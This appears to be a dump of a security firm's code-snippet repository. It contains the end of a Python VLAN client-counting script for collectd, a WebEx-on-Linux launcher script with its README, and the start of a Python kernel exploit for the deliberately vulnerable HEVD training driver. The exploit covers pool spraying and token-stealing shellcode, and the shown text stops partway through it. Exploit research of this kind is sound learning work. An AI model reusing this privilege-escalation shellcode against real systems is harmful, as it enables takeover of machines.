setv6_vlan30=set(table_vlan30_v6) 137 | table_vlan30_v4_v6=setv4_vlan30.intersection(setv6_vlan30) 138 | c_vlan30_v4_v6=len(table_vlan30_v4_v6) 139 | 140 | c_vlan30_v4 = tmp_c_vlan30_v4 - c_vlan30_v4_v6 141 | c_vlan30_v6 = tmp_c_vlan30_v6 - c_vlan30_v4_v6 142 | 143 | return c_vlan30_v6 144 | 145 | 146 | 147 | def vlan40(clients="all"): 148 | #ARP 149 | arp_vlan40=os.popen("sh /home/$user/scripts/cisco_arp_nbc.sh arp_v40").read() 150 | tmp_table_vlan40_v4=(arp_vlan40).split() 151 | tmp_table_vlan40_v4.sort() 152 | table_vlan40_v4=set(tmp_table_vlan40_v4) 153 | tmp_c_vlan40_v4=len(table_vlan40_v4) 154 | 155 | #NBC 156 | nbc_vlan40=os.popen("sh /home/$user/scripts/cisco_arp_nbc.sh nbc_v40").read() 157 | tmp_table_vlan40_v6=(nbc_vlan40).split() 158 | tmp_table_vlan40_v6.sort() 159 | table_vlan40_v6=set(tmp_table_vlan40_v6) 160 | tmp_c_vlan40_v6=len(table_vlan40_v6) 161 | 162 | #dualstack 163 | setv4_vlan40=set(table_vlan40_v4) 164 | setv6_vlan40=set(table_vlan40_v6) 165 | table_vlan40_v4_v6=setv4_vlan40.intersection(setv6_vlan40) 166 | c_vlan40_v4_v6=len(table_vlan40_v4_v6) 167 | 168 | c_vlan40_v4 = tmp_c_vlan40_v4 - c_vlan40_v4_v6 169 | c_vlan40_v6 = tmp_c_vlan40_v6 - c_vlan40_v4_v6 170 | 171 | #clientv4 ; #clientv4_v6 ; #clientv6 172 | if clients == "all": 173 | return c_vlan40_v4 + c_vlan10_v4_v6 + c_vlan10_v6 174 | elif clients == "ipv4only": 175 | return c_vlan40_v4 176 | elif clients == "ipv6only": 177 | return c_vlan40_v6 178 | elif clients == "dualstack": 179 | return c_vlan40_v4_v6 180 | elif clients == "collectd": 181 | return [c_vlan40_v4, c_vlan40_v4_v6, c_vlan40_v6] 182 | 183 | 184 | def bands(output="all"): 185 | wlc_bands = os.popen("sh /home/$user/scripts/cisco_wlc_bands.sh").read() 186 | wlc_bands_a = int(wlc_bands.split(":")[0]) 187 | wlc_bands_b = int(wlc_bands.split(":")[1]) 188 | wlc_bands_g = int(wlc_bands.split(":")[2]) 189 | wlc_bands_n24 = int(wlc_bands.split(":")[3]) 190 | wlc_bands_n5 = int(wlc_bands.split(":")[4]) 191 | if output == "all": 192 | return wlc_bands_a + wlc_bands_b + wlc_bands_g + wlc_bands_n24 + wlc_bands_n5 193 | elif output == "dot11a": 194 | return wlc_bands_a 195 | elif output == "dot11g": 196 | return wlc_bands_g 197 | elif output == "dot11n24": 198 | return wlc_bands_n24 199 | elif output == "dot11n5": 200 | return wlc_bands_n5 201 | elif output == "collectd": 202 | return [wlc_bands_a, wlc_bands_b, wlc_bands_g, wlc_bands_n24, wlc_bands_n5] 203 | 204 | ##### 205 | #MAIN# 206 | ##### 207 | 208 | parser = argparse.ArgumentParser() 209 | parser.add_argument("vlan", help="client vlan or bands" ) 210 | args = parser.parse_args() 211 | 212 | #if len(optionen) != 1: 213 | # parser.error("Es wird eine Option erwartet") 214 | 215 | if args.vlan == "ipv4only": 216 | print(vlan10(clients="ipv4only")) 217 | elif args.vlan == "dualstack": 218 | print(vlan10(clients="dualstack")) 219 | elif args.vlan == "ipv6only": 220 | print(vlan10(clients="ipv6only") + vlan30()) 221 | elif args.vlan == "vlan40": 222 | print(vlan40(clients="all")) 223 | elif args.vlan == "vlan30": 224 | print(vlan30()) 225 | elif args.vlan == "vlan20": 226 | print(vlan20(clients="all")) 227 | elif args.vlan == "collectd": 228 | #vlan10 229 | #vlan10_return = vlan10(clients="collectd") 230 | vlan10_30_return = vlan10_30(clients="collectd") 231 | print('PUTVAL gw.troopers.net/clients/ipv4only N:{0}'.format(vlan10_30_return[0])) 232 | print('PUTVAL gw.troopers.net/clients/dualstack N:{0}'.format(vlan10_30_return[1])) 233 | print('PUTVAL gw.troopers.net/clients/ipv6only N:{0}'.format(vlan10_30_return[2])) 234 | #vlan20 235 | vlan20_return = vlan20(clients="collectd") 236 | print('PUTVAL gw.troopers.net/clients_vlan20/ipv4only N:{0}'.format(vlan20_return[0])) 237 | print('PUTVAL gw.troopers.net/clients_vlan20/dualstack N:{0}'.format(vlan20_return[1])) 238 | print('PUTVAL gw.troopers.net/clients_vlan20/ipv6only N:{0}'.format(vlan20_return[2])) 239 | #vlan30 240 | print('PUTVAL gw.troopers.net/clients_vlan30/ipv6only N:{0}'.format(vlan30())) 241 | #vlan40 242 | vlan40_return = vlan40(clients="collectd") 243 | print('PUTVAL gw.troopers.net/clients_vlan40/ipv4only N:{0}'.format(vlan40_return[0])) 244 | print('PUTVAL gw.troopers.net/clients_vlan40/dualstack N:{0}'.format(vlan40_return[1])) 245 | print('PUTVAL gw.troopers.net/clients_vlan40/ipv6only N:{0}'.format(vlan40_return[2])) 246 | #bands 247 | bands_return = bands(output="collectd") 248 | print('PUTVAL wlc.troopers.net/wlc_bands/dot11a N:{0}'.format(bands_return[0])) 249 | print('PUTVAL wlc.troopers.net/wlc_bands/dot11b N:{0}'.format(bands_return[1])) 250 | print('PUTVAL wlc.troopers.net/wlc_bands/dot11g N:{0}'.format(bands_return[2])) 251 | print('PUTVAL wlc.troopers.net/wlc_bands/dot11n24 N:{0}'.format(bands_return[3])) 252 | print('PUTVAL wlc.troopers.net/wlc_bands/dot11n5 N:{0}'.format(bands_return[4])) 253 | elif args.vlan == "bands": 254 | print(bands(output="all")) 255 | elif args.vlan == "bands2": 256 | bands_return = bands(output="collectd") 257 | print('dot11a:{0}'.format(bands_return[0])) 258 | print('dot11g:{0}'.format(bands_return[1])) 259 | print('dot11n24:{0}'.format(bands_return[2])) 260 | print('dot11n5:{0}'.format(bands_return[3])) 261 | print('------------') 262 | print('all: {0}'.format(sum(bands_return))) 263 | 264 | exit() 265 | -------------------------------------------------------------------------------- /netmon_troopers/types_local.db: -------------------------------------------------------------------------------- 1 | ipv4only value:GAUGE:0:65535 2 | ipv6only value:GAUGE:0:65535 3 | dualstack value:GAUGE:0:65535 4 | wlan_clients clients:GAUGE:0:65535 5 | clients value:GAUGE:0:65535 6 | aps value:GAUGE:0:65535 7 | dot11a value:GAUGE:0:65535 8 | dot11b value:GAUGE:0:65535 9 | dot11g value:GAUGE:0:65535 10 | dot11n24 value:GAUGE:0:65535 11 | dot11n5 value:GAUGE:0:65535 -------------------------------------------------------------------------------- /webex-linux/README.MD: -------------------------------------------------------------------------------- 1 | # Installation 2 | 3 | 1. [Download Firefox x86](https://www.mozilla.org/en-US/firefox/new/) as an __archive__ and unzip it, e.g. in your home folder 4 | 1. [Download JRE x86](http://www.oracle.com/technetwork/java/javase/downloads/index.html) as an __archive__ and unzip it, e.g. in your home folder 5 | 1. [Download webex.sh](https://raw.githubusercontent.com/ernw/insinuator-snippets/master/webex-linux/webex.sh) or clone this repository 6 | 1. Modify the paths in webex.sh to point to the folders of Firefox x86 and JRE x86. 7 | 1. Source webex.sh 8 | * E.g. put `source ` in your .bashrc. This will load it automatically. 9 | 10 | __Please note:__ There is no need to uninstall Firefox or JRE if you have any version of it installed. Also Firefox and JRE won't be auto-updated by your package manager, so you should check both for updates on a regular base. 11 | 12 | Also find the according [blogpost on insinuator.net](https://www.insinuator.net/2015/07/solving-sound-issues-when-using-webex-with-linux-and-firefox/). 13 | 14 | # Usage 15 | To start your WebEx session first close Firefox (the script tries to detect if Firefox is running and will ask you to close it). Then just open a terminal and run `webex` (Be sure to source webex.sh first! See installation above) 16 | 17 | # What this script will do 18 | At the time the post was created, WebEx was able to run 'smoothly' on Linux with 32bit versions of both Firefox and JRE. Essentially this script will just do that: It will put a symlink to the x86 plugin into Firefox' plugin folder and launch x86 Firefox. After Firefox is closed again, it will remove the symlink and you can work with your favorite version of your favorite browser again. :wink: 19 | -------------------------------------------------------------------------------- /webex-linux/webex.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | webex() { 4 | FIREFOX_PATH="/opt/programs/firefox_x86" #Change this to actual path. Note that spaces should be escaped. 5 | JRE_PATH="/opt/programs/jre_x86" #Change this to actual path 6 | WEBEX_URL="https://signin.webex.com/collabs/auth" # initial signon page 7 | 8 | 9 | if pgrep firefox > /dev/null; then 10 | echo "[-] Firefox seems to be running. Please exit first"; 11 | else 12 | echo "[+] Placing link to x86 plugin into ~/.mozilla/plugins" 13 | if [ ! -d ~/.mozilla/plugins ]; then 14 | mkdir -p ~/.mozilla/plugins 15 | fi 16 | if [ -f ~/.mozilla/plugins/libnpjp2.so ]; then 17 | echo "[+] Backing up already existing plugin" 18 | mv ~/.mozilla/plugins/libnpjp2.so ~/.mozilla/plugins/libnpjp2.so.bak 19 | fi 20 | 21 | ln -s "${JRE_PATH}/lib/i386/libnpjp2.so" ~/.mozilla/plugins/; 22 | 23 | echo "[+] Starting x86 firefox" 24 | ${FIREFOX_PATH}/firefox -new-window ${WEBEX_URL}; 25 | 26 | echo "[+] Removing link to x86 plugin" 27 | rm -f ~/.mozilla/plugins/libnpjp2.so; 28 | 29 | if [ -f ~/.mozilla/plugins/libnpjp2.so.bak ]; then 30 | echo "[+] Restoring plugin from backup" 31 | mv ~/.mozilla/plugins/libnpjp2.so.bak ~/.mozilla/plugins/libnpjp2.so 32 | fi 33 | fi; 34 | } 35 | -------------------------------------------------------------------------------- /windows_kernel_exploitation/HEVD_64Kernel_UAF.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | import sys 4 | from ctypes import * 5 | from ctypes.wintypes import * 6 | import struct 7 | import time 8 | import os 9 | 10 | kernel32 = windll.kernel32 11 | ntdll = windll.ntdll 12 | 13 | 14 | ALLOC_SIZE = 0x70 # Adjust this value to get chunk allocations of desired length 15 | BUFSIZE = (ALLOC_SIZE - 0x48) # Calculating buffer size to allocate chunks of given length 16 | 17 | handle_read_array1 = [] 18 | handle_write_array1 = [] 19 | handle_read_array2 = [] 20 | handle_write_array2 = [] 21 | 22 | 23 | METHOD_NEITHER = 0x3 24 | FILE_ANY_ACCESS = 0x0 25 | FILE_DEVICE_UNKNOWN = 0x00000022 26 | 27 | def ctl_code(function, 28 | devicetype = FILE_DEVICE_UNKNOWN, 29 | access = FILE_ANY_ACCESS, 30 | method = METHOD_NEITHER): 31 | """Recreate CTL_CODE macro to generate driver IOCTL""" 32 | return ((devicetype << 16) | (access << 14) | (function << 2) | method) 33 | 34 | def get_device_handle(device): 35 | open_existing = 0x3 36 | generic_read = 0x80000000 37 | generic_write = 0x40000000 38 | 39 | handle = kernel32.CreateFileA(device, 40 | generic_read | generic_write, 41 | None, 42 | None, 43 | open_existing, 44 | 0x40000080, 45 | None) 46 | 47 | if not handle: 48 | print("\t[-] Unable to get device handle") 49 | sys.exit(-1) 50 | 51 | return handle 52 | 53 | 54 | 55 | def spray(): 56 | # Massaging the Pool 57 | 58 | print("[+] Starting to Spray Pool Memory (Filling Holes)") 59 | # Allocating all needed pipes 60 | for i in range(0, 50000): 61 | readPipe = HANDLE() 62 | writePipe = HANDLE() 63 | 64 | # Create Pipe for content in Non-paged Pool 65 | if not kernel32.CreatePipe(byref(readPipe),byref(writePipe),None,BUFSIZE): 66 | print("[!] Failed to Create Pipe... exiting now") 67 | sys.exit(-1) 68 | 69 | # Keep the handles to prevent Garbage Collection 70 | handle_read_array1.append(readPipe) 71 | handle_write_array1.append(writePipe) 72 | 73 | print("Writing buffer now!") 74 | for handle in handle_write_array1: 75 | # Write to the allocated 76 | pipe_content = create_string_buffer("\x41"*BUFSIZE, BUFSIZE) 77 | if not kernel32.WriteFile(handle, pipe_content, BUFSIZE, byref(resultLength), None): 78 | print("[!] Failed to write to pipe... exiting now") 79 | sys.exit(-2) 80 | 81 | print("\t[*] Finished Filling Holes with {0} Objects".format(len(handle_write_array1))) 82 | 83 | print("[+] Spraying 5k more for holes") 84 | for i in range(0, 5000): 85 | readPipe = HANDLE() 86 | writePipe = HANDLE() 87 | 88 | # Create Pipe for content in Non-paged Pool 89 | if not kernel32.CreatePipe(byref(readPipe),byref(writePipe),None,BUFSIZE): 90 | print("[!] Failed to Create Pipe... exiting now") 91 | sys.exit(-1) 92 | 93 | # Keep the handles to prevent Garbage Collection 94 | handle_read_array2.append(readPipe) 95 | handle_write_array2.append(writePipe) 96 | 97 | for handle in handle_write_array2: 98 | # Write to the allocated 99 | pipe_content = create_string_buffer("\x41"*BUFSIZE, BUFSIZE) 100 | if not kernel32.WriteFile(handle, pipe_content, BUFSIZE, byref(resultLength), None): 101 | print("[!] Failed to write to pipe... exiting now") 102 | sys.exit(-2) 103 | 104 | print("[+] Grooming the spray!") 105 | for handle in handle_read_array2[::2]: 106 | buff = create_string_buffer(BUFSIZE+1) 107 | if not kernel32.ReadFile(handle, buff, BUFSIZE, byref(resultLength), None): 108 | print("[!] Failed to write to pipe... exiting now") 109 | sys.exit(-2) 110 | 111 | print("\t[*] Done Grooming!") 112 | return 113 | 114 | 115 | 116 | def virtual_alloc_payload(): 117 | payload_length, payload_address = heap_alloc_payload() 118 | va_address = kernel32.VirtualAlloc(None, 1024, c_int(0x3000), c_int(0x40)) 119 | 120 | print("[+] VirtualAlloc address: 0x%X" % va_address) 121 | print("[+] Copying payload to VirtualAlloc region") 122 | memmove(va_address, payload_address, payload_length) 123 | return va_address 124 | 125 | 126 | def heap_alloc_payload(): 127 | 128 | """ 129 | token_stealing_shellcode = ( 130 | start: 131 | mov rdx, [gs:188h] ;KTHREAD pointer 132 | mov r8, [rdx+70h] ;EPROCESS pointer 133 | mov r9, [r8+188h] ;ActiveProcessLinks list head 134 | mov rcx, [r9] ;follow link to first process in list 135 | find_system: 136 | mov rdx, [rcx-8] ;ActiveProcessLinks - 8 = UniqueProcessId 137 | cmp rdx, 4 ;UniqueProcessId == 4? 138 | jz found_system ;YES - move on 139 | mov rcx, [rcx] ;NO - load next entry in list 140 | jmp find_system ;loop 141 | found_system: 142 | mov rax, [rcx+80h] ;offset to token 143 | and al, 0f0h ;clear low 4 bits of _EX_FAST_REF structure 144 | find_cmd: 145 | mov rdx, [rcx-8] ;ActiveProcessLinks - 8 = UniqueProcessId 146 | cmp rdx, 1234h ;UniqueProcessId == ZZZZ? (PLACEHOLDER) 147 | jz found_cmd ;YES - move on 148 | mov rcx, [rcx] ;NO - next entry in list 149 | jmp find_cmd ;loop 150 | found_cmd: 151 | mov [rcx+80h], rax ;copy SYSTEM token over top of this process's token 152 | return: 153 | ret 154 | ) 155 | """ 156 | 157 | token_stealing_shellcode = ( 158 | "\x65\x48\x8B\x14\x25\x88\x01\x00\x00\x4C\x8B\x42\x70\x4D\x8B\x88" 159 | "\x88\x01\x00\x00\x49\x8B\x09\x48\x8B\x51\xF8\x48\x83\xFA\x04\x74" 160 | "\x05\x48\x8B\x09\xEB\xF1\x48\x8B\x81\x80\x00\x00\x00\x24\xF0\x48" 161 | "\x8B\x51\xF8\x48\x81\xFA" + struct.pack("